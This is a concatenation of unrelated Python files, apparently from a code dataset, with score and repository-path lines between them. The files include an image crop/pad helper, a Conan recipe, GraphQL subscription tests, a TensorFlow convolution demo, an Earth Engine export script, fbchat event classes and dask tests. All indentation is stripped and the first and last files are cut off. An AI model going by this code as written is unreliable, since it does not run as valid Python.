sym_cor = sym_cor[hbeg:hend, wbeg:wend]
hcoords[:, 0] -= wbeg * hcoords[:, 2]
hcoords[:, 1] -= hbeg * hcoords[:, 2]
if hpad or wpad:
nh, nw, _ = img.shape
new_img = np.zeros([th, tw, 3], dtype=img.dtype)
new_mask = np.zeros([th, tw], dtype=mask.dtype)
new_sym_cor = np.zeros([th, tw, 2], dtype=sym_cor.dtype)
hbeg = 0 if not hpad else (th - h) // 2
wbeg = 0 if not wpad else (tw - w) // 2
new_img[hbeg:hbeg + nh, wbeg:wbeg + nw] = img
new_mask[hbeg:hbeg + nh, wbeg:wbeg + nw] = mask
new_sym_cor[hbeg:hbeg + nh, wbeg:wbeg + nw] = sym_cor
hcoords[:, 0] += wbeg * hcoords[:, 2]
hcoords[:, 1] += hbeg * hcoords[:, 2]
img, mask, sym_cor = new_img, new_mask, new_sym_cor
return img, mask, hcoords, sym_cor
def crop_or_padding_to_fixed_size(img, mask, sym_cor, th, tw):
h, w, _ = img.shape
hpad, wpad = th >= h, tw >= w
hbeg = 0 if hpad else np.random.randint(0, h - th)
wbeg = 0 if wpad else np.random.randint(0,
w - tw) # if pad then [0,wend] will larger than [0,w], indexing it is safe
hend = hbeg + th
wend = wbeg + tw
img = img[hbeg:hend, wbeg:wend]
mask = mask[hbeg:hend, wbeg:wend]
sym_cor = sym_cor[hbeg:hend, wbeg:wend]
if hpad or wpad:
nh, nw, _ = img.shape
new_img = np.zeros([th, tw, 3], dtype=img.dtype)
new_mask = np.zeros([th, tw], dtype=mask.dtype)
new_sym_cor = np.zeros([th, tw, 2], dtype=sym_cor.dtype)
hbeg = 0 if not hpad else (th - h) // 2
wbeg = 0 if not wpad else (tw - w) // 2
new_img[hbeg:hbeg + nh, wbeg:wbeg + nw] = img
new_mask[hbeg:hbeg + nh, wbeg:wbeg + nw] = mask
new_sym_cor[hbeg:hbeg + nh, wbeg:wbeg + nw] = sym_cor
img, mask, sym_cor = new_img, new_mask, new_sym_cor
return img, mask, sym_cor
| 2.734375
| 3
|
recipes/nsimd/2.x/conanfile.py
|
rockandsalt/conan-center-index
| 562
|
12783926
|
import os
from conans import ConanFile, CMake, tools
required_conan_version = ">=1.33.0"
class NsimdConan(ConanFile):
name = "nsimd"
homepage = "https://github.com/agenium-scale/nsimd"
description = "Agenium Scale vectorization library for CPUs and GPUs"
topics = ("hpc", "neon", "cuda", "avx", "simd", "avx2", "sse2", "aarch64", "avx512", "sse42", "rocm", "sve", "neon128")
url = "https://github.com/conan-io/conan-center-index"
license = "MIT"
exports_sources = ["CMakeLists.txt", "patches/*"]
generators = "cmake"
settings = "os", "compiler", "build_type", "arch"
options = {
"shared": [True, False],
"fPIC": [True, False],
# This used only when building the library.
# Most functionality is header only.
"simd": [None, "cpu", "sse2", "sse42", "avx", "avx2", "avx512_knl", "avx512_skylake", "neon128", "aarch64", "sve", "sve128", "sve256", "sve512", "sve1024", "sve2048", "cuda", "rocm"]
}
default_options = {
"shared": False,
"fPIC": True,
"simd": None
}
_cmake = None
@property
def _source_subfolder(self):
return "source_subfolder"
@property
def _build_subfolder(self):
return "build_subfolder"
def config_options(self):
if self.settings.os == "Windows":
del self.options.fPIC
def configure(self):
if self.options.shared:
del self.options.fPIC
# Most of the library is header only.
# cpp files do not use STL.
del self.settings.compiler.libcxx
def source(self):
tools.get(**self.conan_data["sources"][self.version], strip_root=True, destination=self._source_subfolder)
def _configure_cmake(self):
if self._cmake:
return self._cmake
self._cmake = CMake(self)
if self.options.simd:
self._cmake.definitions["simd"] = self.options.simd
if self.settings.arch == "armv7hf":
self._cmake.definitions["NSIMD_ARM32_IS_ARMEL"] = False
self._cmake.definitions["CMAKE_POSITION_INDEPENDENT_CODE"] = self.options.get_safe("fPIC", True)
self._cmake.configure(build_folder=self._build_subfolder)
return self._cmake
def _patch_sources(self):
cmakefile_path = os.path.join(self._source_subfolder, "CMakeLists.txt")
tools.replace_in_file(cmakefile_path,
" SHARED ",
" ")
tools.replace_in_file(cmakefile_path,
"RUNTIME DESTINATION lib",
"RUNTIME DESTINATION bin")
tools.replace_in_file(cmakefile_path,
"set_property(TARGET ${o} PROPERTY POSITION_INDEPENDENT_CODE ON)",
"")
def build(self):
self._patch_sources()
cmake = self._configure_cmake()
cmake.build()
def package(self):
self.copy("LICENSE", dst="licenses", src=self._source_subfolder)
cmake = self._configure_cmake()
cmake.install()
def package_info(self):
self.cpp_info.libs = tools.collect_libs(self)
| 1.882813
| 2
|
5_Pham_Ngo_Tien_Dung/1.1.py
|
huong-rose/student-practices
| 0
|
12783927
|
<reponame>huong-rose/student-practices
# Write a program that prints ‘Hello World’ to the screen.
print("hello world!")
| 3.3125
| 3
|
tests/api/serializers.py
|
quangvinh1225/drf-generators
| 0
|
12783928
|
from rest_framework.serializers import ModelSerializer
from api.models import Category, Post
class CategorySerializer(ModelSerializer):
class Meta:
model = Category
class PostSerializer(ModelSerializer):
class Meta:
model = Post
| 1.921875
| 2
|
ramp-utils/ramp_utils/testing.py
|
frcaud/ramp-board
| 13
|
12783929
|
<reponame>frcaud/ramp-board<filename>ramp-utils/ramp_utils/testing.py<gh_stars>10-100
import os
HERE = os.path.dirname(__file__)
def database_config_template():
"""Return the path a template database configuration file.
Returns
-------
filename : str
The database configuration filename.
"""
return os.path.join(HERE, "template", "database_config.yml")
def ramp_config_template():
"""Return the path a template RAMP configuration file.
Returns
-------
filename : str
The RAMP configuration filename.
"""
return os.path.join(HERE, "template", "ramp_config.yml")
def ramp_aws_config_template():
"""Return the path a template RAMP configuration AWS file.
Returns
-------
filename : str
The RAMP configuration on AWS filename.
"""
return os.path.join(HERE, "template", "ramp_config_aws.yml")
| 2.21875
| 2
|
tests/functional/regressions/test_issue87.py
|
matt-koevort/tartiflette
| 530
|
12783930
|
import pytest
@pytest.mark.asyncio
@pytest.mark.ttftt_engine
@pytest.mark.parametrize(
"query,errors",
[
(
"""
subscription Sub {
newDog {
name
}
newHuman {
name
}
}
""",
[
{
"message": "Subcription Sub must select only one top level field.",
"path": None,
"locations": [
{"line": 2, "column": 13},
{"line": 2, "column": 30},
],
"extensions": {
"rule": "5.2.3.1",
"spec": "June 2018",
"details": "https://graphql.github.io/graphql-spec/June2018/#sec-Single-root-field",
"tag": "single-root-field",
},
}
],
),
(
"""
subscription Sub {
newDog {
name
}
__typename
}
""",
[
{
"message": "Subcription Sub must select only one top level field.",
"path": None,
"locations": [
{"line": 2, "column": 13},
{"line": 2, "column": 30},
],
"extensions": {
"rule": "5.2.3.1",
"spec": "June 2018",
"details": "https://graphql.github.io/graphql-spec/June2018/#sec-Single-root-field",
"tag": "single-root-field",
},
}
],
),
(
"""
fragment MultipleSubscriptionsFields on Subscription {
newDog {
name
}
newHuman {
name
}
}
subscription Sub {
...MultipleSubscriptionsFields
}
""",
[
{
"message": "Subcription Sub must select only one top level field.",
"path": None,
"locations": [
{"line": 11, "column": 13},
{"line": 2, "column": 66},
],
"extensions": {
"rule": "5.2.3.1",
"spec": "June 2018",
"details": "https://graphql.github.io/graphql-spec/June2018/#sec-Single-root-field",
"tag": "single-root-field",
},
}
],
),
(
"""
subscription Sub {
... on Subscription {
newDog {
name
}
newHuman {
name
}
}
}
""",
[
{
"message": "Subcription Sub must select only one top level field.",
"path": None,
"locations": [
{"line": 2, "column": 13},
{"line": 3, "column": 35},
],
"extensions": {
"rule": "5.2.3.1",
"spec": "June 2018",
"details": "https://graphql.github.io/graphql-spec/June2018/#sec-Single-root-field",
"tag": "single-root-field",
},
}
],
),
(
"""
fragment MultipleSubscriptionsFields on Subscription {
... on Subscription {
newDog {
name
}
newHuman {
name
}
}
}
subscription Sub {
...MultipleSubscriptionsFields
}
""",
[
{
"message": "Subcription Sub must select only one top level field.",
"path": None,
"locations": [
{"line": 13, "column": 13},
{"line": 3, "column": 35},
],
"extensions": {
"rule": "5.2.3.1",
"spec": "June 2018",
"details": "https://graphql.github.io/graphql-spec/June2018/#sec-Single-root-field",
"tag": "single-root-field",
},
}
],
),
],
)
async def test_issue87(engine, query, errors):
assert await engine.execute(query) == {"data": None, "errors": errors}
| 2.046875
| 2
|
src/my/kadenze/lesson1/ConvolutionTF.py
|
AlfredNeverKog/BrainCarya
| 0
|
12783931
|
<reponame>AlfredNeverKog/BrainCarya
import tensorflow as tf
import numpy as np
import math
import matplotlib.pyplot as plt
from PIL import Image
"""
a = tf.constant([1.0, 2.0, 3.0, 4.0, 5.0, 6.0], shape=[2, 3], name='a')
b = tf.constant([1.0, 2.0, 3.0, 4.0, 5.0, 6.0], shape=[3, 2], name='b')
c = tf.matmul(a, b)
# Creates a session with log_device_placement set to True.
sess = tf.Session(config=tf.ConfigProto(log_device_placement=True))
# Runs the op.
print (sess.run(c))
"""
def reshape_image_and_save(location, img_format):
image = Image.open("%s.%s"%(location, img_format))
im_array = np.array(image)
mMax = min(im_array.shape[:2])
reshaped = im_array[:mMax,:mMax,:]
Image.fromarray(reshaped).save("%s_reshaped.%s"%(location, img_format))
print(mMax)
#reshape_image_and_save('./data/she','png')
sess = tf.InteractiveSession()
image = Image.open('./data/she_reshaped.png')
#plt.imshow(np.array(image)[:,:,0], cmap='gray')
#plt.show()
im_with_one_chanel = np.array(image)[:, :, 0]
im_arr = tf.constant(im_with_one_chanel.squeeze(), dtype=tf.float32)
#Kernel
x_1d = tf.linspace(-3., 3., 30)
z_1d = tf.contrib.distributions.Normal(mu=0.0, sigma=1.0).pdf(x_1d)
z_size = x_1d.get_shape().as_list()[0]
z_2d = tf.matmul(tf.reshape(z_1d,[z_size,1]),tf.reshape(z_1d,[1,z_size]))
plt.figure(1)
plt.imshow(z_2d.eval())
plt.figure(2)
plt.plot(x_1d.eval(),z_1d.eval())
tf.initialize_all_variables()
z_size = x_1d.get_shape().as_list()[0]
#Convert to 4d dimensiopn
z_4d = tf.reshape(z_2d, [z_size, z_size, 1, 1])
image4d = tf.reshape(im_arr,[1,im_arr.get_shape().as_list()[0],
im_arr.get_shape().as_list()[0],1])
convolved = tf.nn.conv2d(image4d, z_4d, strides=[1,1,1,1], padding='SAME')
print(z_4d.eval())
conv = convolved.eval().squeeze()
#normalize
conv = conv/float(conv.max()) * 255.0
print(conv)
plt.figure(3)
plt.imshow(conv,cmap='gray')
plt.show()
#plt.imshow(image,cmap='gray')
| 2.578125
| 3
|
tcorr_image/tcorr_export_default_from_daily.py
|
USGS-ET/ssebop-gee-beta
| 28
|
12783932
|
import argparse
from builtins import input
import datetime
import logging
import pprint
import sys
import ee
import openet.ssebop as ssebop
import utils
# from . import utils
def main(ini_path=None, overwrite_flag=False, delay_time=0, gee_key_file=None,
max_ready=-1):
"""Compute default Tcorr image asset
Parameters
----------
ini_path : str
Input file path.
overwrite_flag : bool, optional
If True, overwrite existing files (the default is False).
delay_time : float, optional
Delay time in seconds between starting export tasks (or checking the
number of queued tasks, see "max_ready" parameter). The default is 0.
gee_key_file : str, None, optional
Earth Engine service account JSON key file (the default is None).
max_ready: int, optional
Maximum number of queued "READY" tasks. The default is -1 which is
implies no limit to the number of tasks that will be submitted.
"""
logging.info('\nCompute default Tcorr image asset')
ini = utils.read_ini(ini_path)
model_name = 'SSEBOP'
# model_name = ini['INPUTS']['et_model'].upper()
tmax_name = ini[model_name]['tmax_source']
export_id_fmt = 'tcorr_image_{product}_default'
tcorr_daily_coll_id = '{}/{}_daily'.format(
ini['EXPORT']['export_coll'], tmax_name.lower())
tcorr_default_img_id = '{}/{}_default'.format(
ini['EXPORT']['export_coll'], tmax_name.lower())
try:
tcorr_default = ini[model_name]['tcorr_default']
except:
tcorr_default = 0.978
if (tmax_name.upper() == 'CIMIS' and
ini['INPUTS']['end_date'] < '2003-10-01'):
logging.error(
'\nCIMIS is not currently available before 2003-10-01, exiting\n')
sys.exit()
elif (tmax_name.upper() == 'DAYMET' and
ini['INPUTS']['end_date'] > '2018-12-31'):
logging.warning(
'\nDAYMET is not currently available past 2018-12-31, '
'using median Tmax values\n')
# sys.exit()
# elif (tmax_name.upper() == 'TOPOWX' and
# ini['INPUTS']['end_date'] > '2017-12-31'):
# logging.warning(
# '\nDAYMET is not currently available past 2017-12-31, '
# 'using median Tmax values\n')
# # sys.exit()
logging.info('\nInitializing Earth Engine')
if gee_key_file:
logging.info(' Using service account key file: {}'.format(gee_key_file))
# The "EE_ACCOUNT" parameter is not used if the key file is valid
ee.Initialize(ee.ServiceAccountCredentials('x', key_file=gee_key_file))
else:
ee.Initialize()
logging.debug('\nTmax properties')
tmax_source = tmax_name.split('_', 1)[0]
tmax_version = tmax_name.split('_', 1)[1]
# tmax_coll_id = 'projects/earthengine-legacy/assets/' \
# 'projects/usgs-ssebop/tmax/{}'.format(tmax_name.lower())
# tmax_coll = ee.ImageCollection(tmax_coll_id)
# tmax_mask = ee.Image(tmax_coll.first()).select([0]).multiply(0)
# logging.debug(' Collection: {}'.format(tmax_coll_id))
logging.debug(' Source: {}'.format(tmax_source))
logging.debug(' Version: {}'.format(tmax_version))
# Get the Tcorr daily image collection properties
logging.debug('\nTcorr Image properties')
tcorr_img = ee.Image(ee.ImageCollection(tcorr_daily_coll_id).first())
tcorr_info = utils.get_info(ee.Image(tcorr_img))
tcorr_geo = tcorr_info['bands'][0]['crs_transform']
tcorr_crs = tcorr_info['bands'][0]['crs']
tcorr_shape = tcorr_info['bands'][0]['dimensions']
# tcorr_geo = ee.Image(tcorr_img).projection().getInfo()['transform']
# tcorr_crs = ee.Image(tcorr_img).projection().getInfo()['crs']
# tcorr_shape = ee.Image(tcorr_img).getInfo()['bands'][0]['dimensions']
tcorr_extent = [tcorr_geo[2], tcorr_geo[5] + tcorr_shape[1] * tcorr_geo[4],
tcorr_geo[2] + tcorr_shape[0] * tcorr_geo[0], tcorr_geo[5]]
logging.debug(' Shape: {}'.format(tcorr_shape))
logging.debug(' Extent: {}'.format(tcorr_extent))
logging.debug(' Geo: {}'.format(tcorr_geo))
logging.debug(' CRS: {}'.format(tcorr_crs))
# Get current running tasks
tasks = utils.get_ee_tasks()
if logging.getLogger().getEffectiveLevel() == logging.DEBUG:
logging.debug(' Tasks: {}\n'.format(len(tasks)))
input('ENTER')
# # Limit by year
# try:
# year_list = sorted(list(utils.parse_int_set(ini['TCORR']['years'])))
# except:
# logging.info('\nTCORR "years" parameter not set in the INI,'
# '\n Defaulting to all available years\n')
# year_list = []
export_id = export_id_fmt.format(product=tmax_name.lower())
logging.info(' Export ID: {}'.format(export_id))
logging.info(' Asset ID: {}'.format(tcorr_default_img_id))
if overwrite_flag:
if export_id in tasks.keys():
logging.debug(' Task already submitted, cancelling')
ee.data.cancelTask(tasks[export_id]['id'])
# This is intentionally not an "elif" so that a task can be
# cancelled and an existing image/file/asset can be removed
if ee.data.getInfo(tcorr_default_img_id):
logging.debug(' Asset already exists, removing')
ee.data.deleteAsset(tcorr_default_img_id)
else:
if export_id in tasks.keys():
logging.debug(' Task already submitted, exiting')
return False
elif ee.data.getInfo(tcorr_default_img_id):
logging.debug(' Asset already exists, exiting')
return False
tcorr_daily_coll = ee.ImageCollection(tcorr_daily_coll_id)
output_img = tcorr_daily_coll.mosaic().multiply(0).add(tcorr_default)\
.updateMask(1).rename(['tcorr'])\
.set({
# 'system:time_start': utils.millis(iter_start_dt),
'date_ingested': datetime.datetime.today().strftime('%Y-%m-%d'),
'model_name': model_name,
'model_version': ssebop.__version__,
'tmax_source': tmax_source.upper(),
'tmax_version': tmax_version.upper(),
})
logging.debug(' Building export task')
task = ee.batch.Export.image.toAsset(
image=ee.Image(output_img),
description=export_id,
assetId=tcorr_default_img_id,
crs=tcorr_crs,
crsTransform='[' + ','.join(list(map(str, tcorr_geo))) + ']',
dimensions='{0}x{1}'.format(*tcorr_shape),
)
logging.debug(' Starting export task')
utils.ee_task_start(task)
# Pause before starting the next export task
utils.delay_task(delay_time, max_ready)
logging.debug('')
def arg_parse():
""""""
parser = argparse.ArgumentParser(
description='Compute/export default Tcorr image asset',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument(
'-i', '--ini', type=utils.arg_valid_file,
help='Input file', metavar='FILE')
parser.add_argument(
'--delay', default=0, type=float,
help='Delay (in seconds) between each export tasks')
parser.add_argument(
'--key', type=utils.arg_valid_file, metavar='FILE',
help='JSON key file')
parser.add_argument(
'--ready', default=-1, type=int,
help='Maximum number of queued READY tasks')
parser.add_argument(
'-o', '--overwrite', default=False, action='store_true',
help='Force overwrite of existing files')
parser.add_argument(
'-d', '--debug', default=logging.INFO, const=logging.DEBUG,
help='Debug level logging', action='store_const', dest='loglevel')
args = parser.parse_args()
# Prompt user to select an INI file if not set at command line
# if not args.ini:
# args.ini = utils.get_ini_path(os.getcwd())
return args
if __name__ == "__main__":
args = arg_parse()
logging.basicConfig(level=args.loglevel, format='%(message)s')
logging.getLogger('googleapiclient').setLevel(logging.ERROR)
main(ini_path=args.ini, overwrite_flag=args.overwrite,
delay_time=args.delay, gee_key_file=args.key, max_ready=args.ready)
| 1.984375
| 2
|
fbchat/_events/_delta_type.py
|
JabLuszko/fbchat
| 1,042
|
12783933
|
<reponame>JabLuszko/fbchat
import attr
import datetime
from ._common import attrs_event, Event, UnknownEvent, ThreadEvent
from .. import _util, _threads, _models
from typing import Sequence, Optional
@attrs_event
class ColorSet(ThreadEvent):
"""Somebody set the color in a thread."""
#: The new color. Not limited to the ones in `ThreadABC.set_color`
color = attr.ib(type=str)
#: When the color was set
at = attr.ib(type=datetime.datetime)
@classmethod
def _parse(cls, session, data):
author, thread, at = cls._parse_metadata(session, data)
color = _threads.ThreadABC._parse_color(data["untypedData"]["theme_color"])
return cls(author=author, thread=thread, color=color, at=at)
@attrs_event
class EmojiSet(ThreadEvent):
"""Somebody set the emoji in a thread."""
#: The new emoji
emoji = attr.ib(type=str)
#: When the emoji was set
at = attr.ib(type=datetime.datetime)
@classmethod
def _parse(cls, session, data):
author, thread, at = cls._parse_metadata(session, data)
emoji = data["untypedData"]["thread_icon"]
return cls(author=author, thread=thread, emoji=emoji, at=at)
@attrs_event
class NicknameSet(ThreadEvent):
"""Somebody set the nickname of a person in a thread."""
#: The person whose nickname was set
subject = attr.ib(type=str)
#: The new nickname. If ``None``, the nickname was cleared
nickname = attr.ib(type=Optional[str])
#: When the nickname was set
at = attr.ib(type=datetime.datetime)
@classmethod
def _parse(cls, session, data):
author, thread, at = cls._parse_metadata(session, data)
subject = _threads.User(
session=session, id=data["untypedData"]["participant_id"]
)
nickname = data["untypedData"]["nickname"] or None # None if ""
return cls(
author=author, thread=thread, subject=subject, nickname=nickname, at=at
)
@attrs_event
class AdminsAdded(ThreadEvent):
"""Somebody added admins to a group."""
#: The people that were set as admins
added = attr.ib(type=Sequence["_threads.User"])
#: When the admins were added
at = attr.ib(type=datetime.datetime)
@classmethod
def _parse(cls, session, data):
author, thread, at = cls._parse_metadata(session, data)
subject = _threads.User(session=session, id=data["untypedData"]["TARGET_ID"])
return cls(author=author, thread=thread, added=[subject], at=at)
@attrs_event
class AdminsRemoved(ThreadEvent):
"""Somebody removed admins from a group."""
#: The people that were removed as admins
removed = attr.ib(type=Sequence["_threads.User"])
#: When the admins were removed
at = attr.ib(type=datetime.datetime)
@classmethod
def _parse(cls, session, data):
author, thread, at = cls._parse_metadata(session, data)
subject = _threads.User(session=session, id=data["untypedData"]["TARGET_ID"])
return cls(author=author, thread=thread, removed=[subject], at=at)
@attrs_event
class ApprovalModeSet(ThreadEvent):
"""Somebody changed the approval mode in a group."""
require_admin_approval = attr.ib(type=bool)
#: When the approval mode was set
at = attr.ib(type=datetime.datetime)
@classmethod
def _parse(cls, session, data):
author, thread, at = cls._parse_metadata(session, data)
raa = data["untypedData"]["APPROVAL_MODE"] == "1"
return cls(author=author, thread=thread, require_admin_approval=raa, at=at)
@attrs_event
class CallStarted(ThreadEvent):
"""Somebody started a call."""
#: When the call was started
at = attr.ib(type=datetime.datetime)
@classmethod
def _parse(cls, session, data):
author, thread, at = cls._parse_metadata(session, data)
return cls(author=author, thread=thread, at=at)
@attrs_event
class CallEnded(ThreadEvent):
"""Somebody ended a call."""
#: How long the call took
duration = attr.ib(type=datetime.timedelta)
#: When the call ended
at = attr.ib(type=datetime.datetime)
@classmethod
def _parse(cls, session, data):
author, thread, at = cls._parse_metadata(session, data)
duration = _util.seconds_to_timedelta(int(data["untypedData"]["call_duration"]))
return cls(author=author, thread=thread, duration=duration, at=at)
@attrs_event
class CallJoined(ThreadEvent):
"""Somebody joined a call."""
#: When the call ended
at = attr.ib(type=datetime.datetime)
@classmethod
def _parse(cls, session, data):
author, thread, at = cls._parse_metadata(session, data)
return cls(author=author, thread=thread, at=at)
@attrs_event
class PollCreated(ThreadEvent):
"""Somebody created a group poll."""
#: The new poll
poll = attr.ib(type="_models.Poll")
#: When the poll was created
at = attr.ib(type=datetime.datetime)
@classmethod
def _parse(cls, session, data):
author, thread, at = cls._parse_metadata(session, data)
poll_data = _util.parse_json(data["untypedData"]["question_json"])
poll = _models.Poll._from_graphql(session, poll_data)
return cls(author=author, thread=thread, poll=poll, at=at)
@attrs_event
class PollVoted(ThreadEvent):
"""Somebody voted in a group poll."""
#: The updated poll
poll = attr.ib(type="_models.Poll")
#: Ids of the voted options
added_ids = attr.ib(type=Sequence[str])
#: Ids of the un-voted options
removed_ids = attr.ib(type=Sequence[str])
#: When the poll was voted in
at = attr.ib(type=datetime.datetime)
@classmethod
def _parse(cls, session, data):
author, thread, at = cls._parse_metadata(session, data)
poll_data = _util.parse_json(data["untypedData"]["question_json"])
poll = _models.Poll._from_graphql(session, poll_data)
added_ids = _util.parse_json(data["untypedData"]["added_option_ids"])
removed_ids = _util.parse_json(data["untypedData"]["removed_option_ids"])
return cls(
author=author,
thread=thread,
poll=poll,
added_ids=[str(x) for x in added_ids],
removed_ids=[str(x) for x in removed_ids],
at=at,
)
@attrs_event
class PlanCreated(ThreadEvent):
"""Somebody created a plan in a group."""
#: The new plan
plan = attr.ib(type="_models.PlanData")
#: When the plan was created
at = attr.ib(type=datetime.datetime)
@classmethod
def _parse(cls, session, data):
author, thread, at = cls._parse_metadata(session, data)
plan = _models.PlanData._from_pull(session, data["untypedData"])
return cls(author=author, thread=thread, plan=plan, at=at)
@attrs_event
class PlanEnded(ThreadEvent):
"""A plan ended."""
#: The ended plan
plan = attr.ib(type="_models.PlanData")
#: When the plan ended
at = attr.ib(type=datetime.datetime)
@classmethod
def _parse(cls, session, data):
author, thread, at = cls._parse_metadata(session, data)
plan = _models.PlanData._from_pull(session, data["untypedData"])
return cls(author=author, thread=thread, plan=plan, at=at)
@attrs_event
class PlanEdited(ThreadEvent):
"""Somebody changed a plan in a group."""
#: The updated plan
plan = attr.ib(type="_models.PlanData")
#: When the plan was updated
at = attr.ib(type=datetime.datetime)
@classmethod
def _parse(cls, session, data):
author, thread, at = cls._parse_metadata(session, data)
plan = _models.PlanData._from_pull(session, data["untypedData"])
return cls(author=author, thread=thread, plan=plan, at=at)
@attrs_event
class PlanDeleted(ThreadEvent):
"""Somebody removed a plan in a group."""
#: The removed plan
plan = attr.ib(type="_models.PlanData")
#: When the plan was removed
at = attr.ib(type=datetime.datetime)
@classmethod
def _parse(cls, session, data):
author, thread, at = cls._parse_metadata(session, data)
plan = _models.PlanData._from_pull(session, data["untypedData"])
return cls(author=author, thread=thread, plan=plan, at=at)
@attrs_event
class PlanResponded(ThreadEvent):
"""Somebody responded to a plan in a group."""
#: The plan that was responded to
plan = attr.ib(type="_models.PlanData")
#: Whether the author will go to the plan or not
take_part = attr.ib(type=bool)
#: When the plan was removed
at = attr.ib(type=datetime.datetime)
@classmethod
def _parse(cls, session, data):
author, thread, at = cls._parse_metadata(session, data)
plan = _models.PlanData._from_pull(session, data["untypedData"])
take_part = data["untypedData"]["guest_status"] == "GOING"
return cls(author=author, thread=thread, plan=plan, take_part=take_part, at=at)
def parse_admin_message(session, data):
type_ = data["type"]
if type_ == "change_thread_theme":
return ColorSet._parse(session, data)
elif type_ == "change_thread_icon":
return EmojiSet._parse(session, data)
elif type_ == "change_thread_nickname":
return NicknameSet._parse(session, data)
elif type_ == "change_thread_admins":
event_type = data["untypedData"]["ADMIN_EVENT"]
if event_type == "add_admin":
return AdminsAdded._parse(session, data)
elif event_type == "remove_admin":
return AdminsRemoved._parse(session, data)
else:
pass
elif type_ == "change_thread_approval_mode":
return ApprovalModeSet._parse(session, data)
elif type_ == "instant_game_update":
pass # TODO: This
elif type_ == "messenger_call_log": # Previously "rtc_call_log"
event_type = data["untypedData"]["event"]
if event_type == "group_call_started":
return CallStarted._parse(session, data)
elif event_type in ["group_call_ended", "one_on_one_call_ended"]:
return CallEnded._parse(session, data)
else:
pass
elif type_ == "participant_joined_group_call":
return CallJoined._parse(session, data)
elif type_ == "group_poll":
event_type = data["untypedData"]["event_type"]
if event_type == "question_creation":
return PollCreated._parse(session, data)
elif event_type == "update_vote":
return PollVoted._parse(session, data)
else:
pass
elif type_ == "lightweight_event_create":
return PlanCreated._parse(session, data)
elif type_ == "lightweight_event_notify":
return PlanEnded._parse(session, data)
elif type_ == "lightweight_event_update":
return PlanEdited._parse(session, data)
elif type_ == "lightweight_event_delete":
return PlanDeleted._parse(session, data)
elif type_ == "lightweight_event_rsvp":
return PlanResponded._parse(session, data)
return UnknownEvent(source="Delta type", data=data)
| 2.46875
| 2
|
distributed/protocol/tests/test_highlevelgraph.py
|
crusaderky/distributed
| 1,358
|
12783934
|
<gh_stars>1000+
import ast
import pytest
import dask
import dask.array as da
import dask.dataframe as dd
from distributed.diagnostics import SchedulerPlugin
from distributed.utils_test import gen_cluster
np = pytest.importorskip("numpy")
pd = pytest.importorskip("pandas")
from numpy.testing import assert_array_equal
@gen_cluster(client=True)
async def test_combo_of_layer_types(c, s, a, b):
"""Check pack/unpack of a HLG that has everything!"""
def add(x, y, z, extra_arg):
return x + y + z + extra_arg
y = c.submit(lambda x: x, 2)
z = c.submit(lambda x: x, 3)
x = da.blockwise(
add,
"x",
da.zeros((3,), chunks=(1,)),
"x",
da.ones((3,), chunks=(1,)),
"x",
y,
None,
concatenate=False,
dtype=int,
extra_arg=z,
)
df = dd.from_pandas(pd.DataFrame({"a": np.arange(3)}), npartitions=3)
df = df.shuffle("a", shuffle="tasks")
df = df["a"].to_dask_array()
res = x.sum() + df.sum()
res = await c.compute(res, optimize_graph=False)
assert res == 21
@gen_cluster(client=True)
async def test_blockwise(c, s, a, b):
"""Check pack/unpack of blockwise layer"""
def add(x, y, z, extra_arg):
return x + y + z + extra_arg
y = c.submit(lambda x: x, 10)
z = c.submit(lambda x: x, 3)
x = da.blockwise(
add,
"x",
da.zeros((3,), chunks=(1,)),
"x",
da.ones((3,), chunks=(1,)),
"x",
y,
None,
concatenate=False,
dtype=int,
extra_arg=z,
)
res = await c.compute(x.sum(), optimize_graph=False)
assert res == 42
@gen_cluster(client=True)
async def test_shuffle(c, s, a, b):
"""Check pack/unpack of a shuffled dataframe"""
df = dd.from_pandas(
pd.DataFrame(
{"a": np.arange(10, dtype=int), "b": np.arange(10, 0, -1, dtype=float)}
),
npartitions=5,
)
df = df.shuffle("a", shuffle="tasks", max_branch=2)
df = df["a"] + df["b"]
res = await c.compute(df, optimize_graph=False)
assert res.dtypes == np.float64
assert (res == 10.0).all()
class ExampleAnnotationPlugin(SchedulerPlugin):
def __init__(self, priority_fn=None, qux="", resource="", retries=0):
self.priority_fn = priority_fn or (lambda k: 0)
self.qux = qux
self.resource = resource
self.retries = retries
self.priority_matches = 0
self.resource_matches = 0
self.retry_matches = 0
self.qux_matches = 0
def update_graph(self, scheduler, dsk=None, keys=None, restrictions=None, **kwargs):
annots = kwargs["annotations"]
if "priority" in annots:
self.priority_matches = sum(
int(self.priority_fn(ast.literal_eval(k)) == p)
for k, p in annots["priority"].items()
)
if "qux" in annots:
self.qux_matches = sum(int(self.qux == v) for v in annots["qux"].values())
if "custom_resource" in annots:
self.resource_matches = sum(
int(self.resource == v) for v in annots["custom_resource"].values()
)
if "retries" in annots:
self.retry_matches = sum(
int(self.retries == v) for v in annots["retries"].values()
)
@gen_cluster(client=True)
async def test_array_annotations(c, s, a, b):
def fn(k):
return k[1] * 5 + k[2]
qux = "baz"
resource = "widget"
plugin = ExampleAnnotationPlugin(priority_fn=fn, qux=qux, resource=resource)
s.add_plugin(plugin)
assert plugin in s.plugins.values()
with dask.annotate(priority=fn, qux=qux):
A = da.ones((10, 10), chunks=(2, 2))
with dask.annotate(custom_resource=resource):
B = A + 1
with dask.config.set(optimization__fuse__active=False):
result = await c.compute(B)
assert_array_equal(result, 2)
# There are annotation matches per array chunk (i.e. task)
assert plugin.qux_matches == A.npartitions
assert plugin.priority_matches == A.npartitions
assert plugin.resource_matches == B.npartitions
@gen_cluster(client=True)
async def test_dataframe_annotations(c, s, a, b):
retries = 5
plugin = ExampleAnnotationPlugin(retries=retries)
s.add_plugin(plugin)
assert plugin in s.plugins.values()
df = dd.from_pandas(
pd.DataFrame(
{"a": np.arange(10, dtype=int), "b": np.arange(10, 0, -1, dtype=float)}
),
npartitions=5,
)
df = df.shuffle("a", shuffle="tasks", max_branch=2)
acol = df["a"]
bcol = df["b"]
with dask.annotate(retries=retries):
df = acol + bcol
with dask.config.set(optimization__fuse__active=False):
rdf = await c.compute(df)
assert rdf.dtypes == np.float64
assert (rdf == 10.0).all()
# There is an annotation match per partition (i.e. task)
assert plugin.retry_matches == df.npartitions
| 2.140625
| 2
|
CLEAN/enviroment/ChemEnv.py
|
tsteternlieb/DrugDesignThesis
| 2
|
12783935
|
<filename>CLEAN/enviroment/ChemEnv.py
from audioop import add
import copy
import torch, random, dgl
import networkx as nx
from rdkit import Chem
import dgl.data
